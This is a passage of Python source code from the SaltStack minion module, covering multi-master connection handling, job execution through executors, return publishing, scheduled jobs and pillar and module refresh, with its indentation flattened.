self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(
self.opts,
utils=self.utils,
whitelist=self.whitelist,
initial_load=initial_load)
self.serializers = salt.loader.serializers(self.opts)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MinionManager(MinionBase):
'''
Create a multi-minion interface; this creates as many minions as are
defined in the master option and binds each minion object to a respective
master.
'''
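# Illustrative multi-master opts (hostnames are assumptions):
#
#   opts['master'] = ['master1.example.com', 'master2.example.com']
#   opts['master_type'] = 'str'
#   MinionManager(opts).tune_in()
#
# This spawns one Minion coroutine per listed master and keeps them all
# connected; in failover mode the whole list is instead handed to a single
# Minion, which picks one master via eval_master() above.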
def __init__(self, opts):
super(MinionManager, self).__init__(opts)
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self.minions = []
self.jid_queue = []
if HAS_ZMQ:
zmq.eventloop.ioloop.install()
self.io_loop = LOOP_CLASS.current()
def _bind(self):
# start up the event publisher, so we can see events during startup
self.event_publisher = salt.utils.event.AsyncEventPublisher(
self.opts,
io_loop=self.io_loop,
)
self.event = salt.utils.event.get_event('minion', opts=self.opts, io_loop=self.io_loop)
self.event.subscribe('')
self.event.set_event_handler(self.handle_event)
@tornado.gen.coroutine
def handle_event(self, package):
yield [minion.handle_event(package) for minion in self.minions]
def _create_minion_object(self, opts, timeout, safe,
io_loop=None, loaded_base_name=None,
jid_queue=None):
'''
Helper function to return the correct type of object
'''
return Minion(opts,
timeout,
safe,
io_loop=io_loop,
loaded_base_name=loaded_base_name,
jid_queue=jid_queue)
def _spawn_minions(self):
'''
Spawn all the coroutines which will sign in to masters
'''
masters = self.opts['master']
if self.opts['master_type'] == 'failover' or not isinstance(self.opts['master'], list):
masters = [masters]
for master in masters:
s_opts = copy.deepcopy(self.opts)
s_opts['master'] = master
s_opts['multimaster'] = True
minion = self._create_minion_object(s_opts,
s_opts['auth_timeout'],
False,
io_loop=self.io_loop,
loaded_base_name='salt.loader.{0}'.format(s_opts['master']),
jid_queue=self.jid_queue,
)
self.minions.append(minion)
self.io_loop.spawn_callback(self._connect_minion, minion)
@tornado.gen.coroutine
def _connect_minion(self, minion):
'''
Create a minion, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = minion.opts['acceptance_wait_time']
while True:
try:
yield minion.connect_master()
minion.tune_in(start=False)
break
except SaltClientError as exc:
log.error('Error while bringing up minion for multi-master. Is master at {0} responding?'.format(minion.opts['master']))
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except Exception as e:
log.critical('Unexpected error while connecting to {0}'.format(minion.opts['master']), exc_info=True)
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
This loop will attempt to create connections to masters it hasn't connected
to yet, but once the initial connection is made it is up to ZMQ to do the
reconnect (don't know of an API to get the state here in salt)
'''
self._bind()
# Fire off all the minion coroutines
self._spawn_minions()
# serve forever!
self.io_loop.start()
@property
def restart(self):
for minion in self.minions:
if minion.restart:
return True
return False
def stop(self, signum):
for minion in self.minions:
minion.process_manager.stop_restarting()
minion.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
minion.process_manager.kill_children()
minion.destroy()
def destroy(self):
for minion in self.minions:
minion.destroy()
def reload(self):
for minion in self.minions:
minion.reload()
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
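# Typical usage sketch (illustrative only), mirroring how the daemon and
# MinionManager above drive this class:
#
#   minion = Minion(opts)
#   minion.tune_in()              # blocking: connect to a master and serve forever
#
# or, on an externally managed io_loop:
#
#   yield minion.connect_master()
#   minion.tune_in(start=False)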
def __init__(self, opts, timeout=60, safe=True, loaded_base_name=None, io_loop=None, jid_queue=None): # pylint: disable=W0231
'''
Pass in the options dict
'''
# this means that the parent class doesn't know *which* master we connect to
super(Minion, self).__init__(opts)
self.timeout = timeout
self.safe = safe
self._running = None
self.win_proc = []
self.loaded_base_name = loaded_base_name
self.connected = False
self.restart = False
# Flag meaning minion has finished initialization including first connect to the master.
# True means the Minion is fully functional and ready to handle events.
self.ready = False
self.jid_queue = jid_queue
if io_loop is None:
if HAS_ZMQ:
zmq.eventloop.ioloop.install()
self.io_loop = LOOP_CLASS.current()
else:
self.io_loop = io_loop
# Warn if ZMQ < 3.2
if HAS_ZMQ:
try:
zmq_version_info = zmq.zmq_version_info()
except AttributeError:
# PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to
# using zmq.zmq_version() and build a version info tuple.
zmq_version_info = tuple(
[int(x) for x in zmq.zmq_version().split('.')] # pylint: disable=no-member
)
if zmq_version_info < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
# Late setup of the opts grains, so we can log from the grains
# module. If this is a proxy, however, we need to init the proxymodule
# before we can get the grains. We do this for proxies in the
# post_master_init
if not salt.utils.is_proxy():
self.opts['grains'] = salt.loader.grains(opts)
log.info('Creating minion process manager')
self.process_manager = ProcessManager(name='MinionProcessManager')
self.io_loop.spawn_callback(self.process_manager.run, async=True)
# We don't have the proxy setup yet, so we can't start engines
# Engines need to be able to access __proxy__
if not salt.utils.is_proxy():
self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
self.process_manager)
# Install the SIGINT/SIGTERM handlers if not done so far
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, self._handle_signals)
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument
self._running = False
# escalate the signals to the process manager
self.process_manager.stop_restarting()
self.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
self.process_manager.kill_children()
time.sleep(1)
sys.exit(0)
def sync_connect_master(self, timeout=None):
'''
Block until we are connected to a master
'''
self._sync_connect_master_success = False
log.debug("sync_connect_master")
def on_connect_master_future_done(future):
self._sync_connect_master_success = True
self.io_loop.stop()
self._connect_master_future = self.connect_master()
# finish connecting to master
self._connect_master_future.add_done_callback(on_connect_master_future_done)
if timeout:
self.io_loop.call_later(timeout, self.io_loop.stop)
try:
self.io_loop.start()
except KeyboardInterrupt:
self.destroy()
# I made the following 3 line oddity to preserve traceback.
# Please read PR #23978 before changing, hopefully avoiding regressions.
# Good luck, we're all counting on you. Thanks.
future_exception = self._connect_master_future.exc_info()
if future_exception:
# This needs to be re-raised to preserve restart_on_error behavior.
six.reraise(*future_exception)
if timeout and self._sync_connect_master_success is False:
raise SaltDaemonNotRunning('Failed to connect to the salt-master')
def reload(self):
log.info('Minion reloading config')
disk_opts = salt.config.minion_config(os.path.join(salt.syspaths.CONFIG_DIR, 'minion')) # FIXME POC
self.opts = salt.utils.dictupdate.merge_overwrite(self.opts, disk_opts)
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
@tornado.gen.coroutine
def connect_master(self):
'''
Return a future which will complete when you are connected to a master
'''
master, self.pub_channel = yield self.eval_master(self.opts, self.timeout, self.safe)
yield self._post_master_init(master)
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
If this function is changed, please check ProxyMinion._post_master_init
to see if those changes need to be propagated.
Minions and ProxyMinions need significantly different post master setups,
which is why the differences are not factored out into separate helper
functions.
'''
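# In short: this refreshes pillar, reloads modules/returners/executors, and
# (depending on opts) registers the default scheduled jobs set up below:
# '__mine_interval' for mine.update, a master-alive check via status.master,
# and a failback ping via status.ping_master.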
if self.connected:
self.opts['master'] = master
# Initialize pillar before loader to make pillar accessible in modules
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv')
).compile_pillar()
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
cleanup=[master_event(type='alive')])
# add default scheduling jobs to the minions scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if (self.opts['transport'] != 'tcp' and
self.opts['master_alive_interval'] > 0 and
self.connected):
self.schedule.add_job({
master_event(type='alive', master=self.opts['master']):
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
if self.opts['master_failback'] and \
'master_list' in self.opts and \
self.opts['master'] != self.opts['master_list'][0]:
self.schedule.add_job({
master_event(type='failback'):
{
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
}, persist=True)
else:
self.schedule.delete_job(master_event(type='failback'), persist=True)
else:
self.schedule.delete_job(master_event(type='alive', master=self.opts['master']), persist=True)
self.schedule.delete_job(master_event(type='failback'), persist=True)
self.grains_cache = self.opts['grains']
self.ready = True
def _return_retry_timer(self):
'''
Based on the minion configuration, either return a randomized timer or
just return the value of the return_retry_timer.
'''
msg = 'Minion return retry timer set to {0} seconds'
if self.opts.get('return_retry_timer_max'):
try:
random_retry = randint(self.opts['return_retry_timer'], self.opts['return_retry_timer_max'])
log.debug(msg.format(random_retry) + ' (randomized)')
return random_retry
except ValueError:
# Catch wiseguys using negative integers here
log.error(
'Invalid value (return_retry_timer: {0} or return_retry_timer_max: {1}); '
'both must be positive integers'.format(
self.opts['return_retry_timer'],
self.opts['return_retry_timer_max'],
)
)
log.debug(msg.format(DEFAULT_MINION_OPTS['return_retry_timer']))
return DEFAULT_MINION_OPTS['return_retry_timer']
else:
log.debug(msg.format(self.opts.get('return_retry_timer')))
return self.opts.get('return_retry_timer')
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in six.iteritems(self.opts):
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _load_modules(self, force_refresh=False, notify=False, grains=None):
'''
Return the functions and the returners loaded up from the loader
module
'''
# if this is a *nix system AND modules_max_memory is set, let's enforce
# a memory limit on module imports
# this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
modules_max_memory = False
if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug('modules_max_memory set, enforcing a maximum of {0}'.format(self.opts['modules_max_memory']))
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
rss, vms = psutil.Process(os.getpid()).memory_info()
mem_limit = rss + vms + self.opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
elif self.opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
# This might be a proxy minion
if hasattr(self, 'proxy'):
proxy = self.proxy
else:
proxy = None
if grains is None:
self.opts['grains'] = salt.loader.grains(self.opts, force_refresh, proxy=proxy)
self.utils = salt.loader.utils(self.opts)
if self.opts.get('multimaster', False):
s_opts = copy.deepcopy(self.opts)
functions = salt.loader.minion_mods(s_opts, utils=self.utils, proxy=proxy,
loaded_base_name=self.loaded_base_name, notify=notify)
else:
functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=notify, proxy=proxy)
returners = salt.loader.returners(self.opts, functions)
errors = {}
if '_errors' in functions:
errors = functions['_errors']
functions.pop('_errors')
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
executors = salt.loader.executors(self.opts, functions)
return functions, returners, errors, executors
def _send_req_sync(self, load, timeout):
channel = salt.transport.Channel.factory(self.opts)
return channel.send(load, timeout=timeout)
@tornado.gen.coroutine
def _send_req_async(self, load, timeout):
channel = salt.transport.client.AsyncReqChannel.factory(self.opts)
ret = yield channel.send(load, timeout=timeout)
raise tornado.gen.Return(ret)
def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60, sync=True):
'''
Fire an event on the master, or drop message if unable to send.
'''
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
elif not data and tag:
load['data'] = {}
load['tag'] = tag
else:
return
def timeout_handler(*_):
log.info('fire_master failed: master could not be contacted. Request timed out.')
return True
if sync:
try:
self._send_req_sync(load, timeout)
except salt.exceptions.SaltReqTimeoutError:
log.info('fire_master failed: master could not be contacted. Request timed out.')
return False
except Exception:
log.info('fire_master failed: {0}'.format(traceback.format_exc()))
return False
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self._send_req_async(load, timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
return True
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
if 'user' in data:
log.info(
'User {0[user]} Executing command {0[fun]} with jid '
'{0[jid]}'.format(data)
)
else:
log.info(
'Executing command {0[fun]} with jid {0[jid]}'.format(data)
)
log.debug('Command details {0}'.format(data))
# Don't duplicate jobs
log.trace('Started JIDs: {0}'.format(self.jid_queue))
if self.jid_queue is not None:
if data['jid'] in self.jid_queue:
return
else:
self.jid_queue.append(data['jid'])
if len(self.jid_queue) > self.opts['minion_jid_queue_hwm']:
self.jid_queue.pop(0)
if isinstance(data['fun'], six.string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
# We stash an instance reference to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
multiprocessing_enabled = self.opts.get('multiprocessing', True)
if multiprocessing_enabled:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
with default_signals(signal.SIGINT, signal.SIGTERM):
process = SignalHandlingMultiprocessingProcess(
target=self._target, args=(instance, self.opts, data, self.connected)
)
else:
process = threading.Thread(
target=self._target,
args=(instance, self.opts, data, self.connected),
name=data['jid']
)
if multiprocessing_enabled:
with default_signals(signal.SIGINT, signal.SIGTERM):
# Reset current signals before starting the process in
# order not to inherit the current signal handlers
process.start()
else:
process.start()
# TODO: remove the windows specific check?
if multiprocessing_enabled and not salt.utils.is_windows():
# we only want to join() immediately if we are daemonizing a process
process.join()
else:
self.win_proc.append(process)
def ctx(self):
'''Return a single context manager for the minion's data
'''
if six.PY2:
return contextlib.nested(
self.functions.context_dict.clone(),
self.returners.context_dict.clone(),
self.executors.context_dict.clone(),
)
else:
exitstack = contextlib.ExitStack()
exitstack.push(self.functions.context_dict.clone())
exitstack.push(self.returners.context_dict.clone())
exitstack.push(self.executors.context_dict.clone())
return exitstack
@classmethod
def _target(cls, minion_instance, opts, data, connected):
if not minion_instance:
minion_instance = cls(opts)
minion_instance.connected = connected
if not hasattr(minion_instance, 'functions'):
functions, returners, function_errors, executors = (
minion_instance._load_modules(grains=opts['grains'])
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
if not hasattr(minion_instance, 'serial'):
minion_instance.serial = salt.payload.Serial(opts)
if not hasattr(minion_instance, 'proc_dir'):
uid = salt.utils.get_uid(user=opts.get('user', None))
minion_instance.proc_dir = (
get_proc_dir(opts['cachedir'], uid=uid)
)
with tornado.stack_context.StackContext(minion_instance.ctx):
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
Minion._thread_multi_return(minion_instance, opts, data)
else:
Minion._thread_return(minion_instance, opts, data)
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target; it starts the actual
minion-side execution.
'''
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing'] and not salt.utils.is_windows():
# Shutdown the multiprocessing before daemonizing
salt.log.setup.shutdown_multiprocessing_logging()
salt.utils.daemonize_if(opts)
# Reconfigure multiprocessing logging after daemonizing
salt.log.setup.setup_multiprocessing_logging()
salt.utils.appendproctitle('{0}._thread_return {1}'.format(cls.__name__, data['jid']))
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID {0}'.format(sdata['pid']))
with salt.utils.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
if function_name in minion_instance.functions:
try:
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
# this minion is blacked out. Only allow saltutil.refresh_pillar
if function_name != 'saltutil.refresh_pillar' and \
function_name not in minion_instance.opts['pillar'].get('minion_blackout_whitelist', []):
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
func = minion_instance.functions[function_name]
args, kwargs = load_args_and_kwargs(
func,
data['arg'],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
executors = data.get('module_executors') or opts.get('module_executors', ['direct_call.get'])
if isinstance(executors, six.string_types):
executors = [executors]
elif not isinstance(executors, list) or not executors:
raise SaltInvocationError("Wrong executors specification: {0}. String or non-empty list expected".
format(executors))
if opts.get('sudo_user', '') and executors[-1] != 'sudo.get':
if executors[-1] in FUNCTION_EXECUTORS:
executors[-1] = 'sudo.get' # replace
else:
executors.append('sudo.get') # append
log.trace('Executors list {0}'.format(executors)) # pylint: disable=no-member
# Get executors
def get_executor(name):
executor_class = minion_instance.executors.get(name)
if executor_class is None:
raise SaltInvocationError("Executor '{0}' is not available".format(name))
return executor_class
# Get the last one that is function executor
executor = get_executor(executors.pop())(opts, data, func, args, kwargs)
# Instantiate others from bottom to the top
for executor_name in reversed(executors):
executor = get_executor(executor_name)(opts, data, executor)
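# Illustrative example (the 'splay.get' name is an assumption): with
# executors == ['splay.get', 'direct_call.get'], 'direct_call.get' is popped
# and bound to (func, args, kwargs), then 'splay.get' is wrapped around it,
# so executor.execute() runs splay -> direct_call -> func.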
return_data = executor.execute()
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], str(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
ret['retcode'] = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
ret['success'] = True
except CommandNotFoundError as exc:
msg = 'Command required for \'{0}\' not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
except CommandExecutionError as exc:
log.error(
'A command in \'{0}\' had a problem: {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
except SaltInvocationError as exc:
log.error(
'Problem executing \'{0}\': {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR executing \'{0}\': {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
except TypeError as exc:
msg = 'Passed invalid arguments to {0}: {1}\n{2}'.format(function_name, exc, func.__doc__)
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret['return'] = msg
ret['out'] = 'nested'
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info_on_loglevel=True)
salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
else:
ret['return'] = minion_instance.functions.missing_fun_string(function_name)
mod_name = function_name.split('.')[0]
if mod_name in minion_instance.function_errors:
ret['return'] += ' Possible reasons: \'{0}\''.format(
minion_instance.function_errors[mod_name]
)
ret['success'] = False
ret['retcode'] = 254
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'master_id' in data:
ret['master_id'] = data['master_id']
if 'metadata' in data:
if isinstance(data['metadata'], dict):
ret['metadata'] = data['metadata']
else:
log.warning('The metadata parameter must be a dictionary. Ignoring.')
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
# TODO: make a list? Seems odd to split it this late :/
if data['ret'] and isinstance(data['ret'], six.string_types):
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
log.error(traceback.format_exc())
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target; it starts the actual
minion-side execution.
'''
salt.utils.appendproctitle('{0}._thread_multi_return {1}'.format(cls.__name__, data['jid']))
ret = {
'return': {},
'retcode': {},
'success': {}
}
for ind in range(0, len(data['fun'])):
ret['success'][data['fun'][ind]] = False
try:
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
# this minion is blacked out. Only allow saltutil.refresh_pillar
if data['fun'][ind] != 'saltutil.refresh_pillar' and \
data['fun'][ind] not in minion_instance.opts['pillar'].get('minion_blackout_whitelist', []):
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = load_args_and_kwargs(
func,
data['arg'][ind],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
ret['return'][data['fun'][ind]] = func(*args, **kwargs)
ret['retcode'][data['fun'][ind]] = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
ret['success'][data['fun'][ind]] = True
except Exception as exc:
trb = traceback.format_exc()
log.warning(
'The minion function caused an exception: {0}'.format(
exc
)
)
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'metadata' in data:
ret['metadata'] = data['metadata']
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
def _return_pub(self, ret, ret_cmd='_return', timeout=60, sync=True):
'''
Return the data from the executed command to the master server
'''
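# Illustrative shape of the load sent for a normal return (values are
# assumptions):
#
#   {'cmd': '_return', 'id': 'minion-id', 'jid': '20230101000000000000',
#    'fun': 'test.ping', 'return': True, 'retcode': 0, 'success': True}
#
# The '_syndic_return' branch below instead nests the job results under
# 'return' and carries the original targeting data and '__load__' payload.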
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: {0}'.format(jid))
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['id'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__')}
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
load['return'] = {}
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error('Invalid outputter {0}. This is likely a bug.'
.format(ret['out']))
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
salt.utils.minion.cache_jobs(self.opts, load['jid'], ret)
if not self.opts['pub_ret']:
return ''
def timeout_handler(*_):
msg = ('The minion failed to return the job information for job '
'{0}. This is often due to the master being shut down or '
'overloaded. If the master is running consider increasing '
'the worker_threads value.').format(jid)
log.warning(msg)
return True
if sync:
try:
ret_val = self._send_req_sync(load, timeout=timeout)
except SaltReqTimeoutError:
timeout_handler()
return ''
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
ret_val = self._send_req_async(load, timeout=timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
log.trace('ret_val = {0}'.format(ret_val)) # pylint: disable=no-member
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
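# Illustrative opts for this feature (the SLS names are assumptions):
#
#   opts['startup_states'] = 'sls'
#   opts['sls_list'] = ['edit.vim', 'nginx']
#
# which makes the minion run state.sls on those SLS files right after its
# first connection; 'top' and 'highstate' are handled in the branches below.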
if self.opts['startup_states']:
if self.opts.get('master_type', 'str') == 'disable' and \
self.opts.get('file_client', 'remote') == 'remote':
log.warning('Cannot run startup_states when \'master_type\' is '
'set to \'disable\' and \'file_client\' is set to '
'\'remote\'. Skipping.')
else:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# dup name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def module_refresh(self, force_refresh=False, notify=False):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing modules. Notify={0}'.format(notify))
self.functions, self.returners, _, self.executors = self._load_modules(force_refresh, notify=notify)
self.schedule.functions = self.functions
self.schedule.returners = self.returners
# TODO: only allow one future in flight at a time?
@tornado.gen.coroutine
def pillar_refresh(self, force_refresh=False):
'''
Refresh the pillar
'''
if self.connected:
log.debug('Refreshing pillar')
try:
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
except SaltClientError:
# Do not exit if a pillar refresh fails.
log.error('Pillar data could not be refreshed. '
'One or more masters may be down!')
self.module_refresh(force_refresh)
def manage_schedule(self, tag, data):
'''
Manage the minion's scheduler: add, delete, modify, enable, disable or run jobs based on the event data.
'''
func = data.get('func', None)
name = data.get('name', None)
schedule = data.get('schedule', None)
where = data.get('where', None)
persist = data.get('persist', None)
if func == 'delete':
self.schedule.delete_job(name, persist)
elif func == 'add':
self.schedule.add_job(schedule, persist)
elif func == 'modify':
self.schedule.modify_job(name, schedule, persist, where)
elif func == 'enable':
self.schedule.enable_schedule()
elif func == 'disable':
self.schedule.disable_schedule()
elif func == 'enable_job':
self.schedule.enable_job(name, persist, where)
elif func == 'run_job':
self.schedule.run_job(name)
elif func == 'disable_job':
self.schedule.disable_job(name, persist, where)
elif func == 'reload':
self.schedule.reload(schedule)
elif func == 'list':
self.schedule.list(where)
elif func == 'save_schedule':
self.schedule.save_schedule()
def manage_beacons(self, tag, data):
'''
Manage Beacons
'''
func = data.get('func', None)
name = data.get('name', None)
beacon_data = data.get('beacon_data', None)
if func == 'add':
self.beacons.add_beacon(name, beacon_data)
elif func == 'modify':
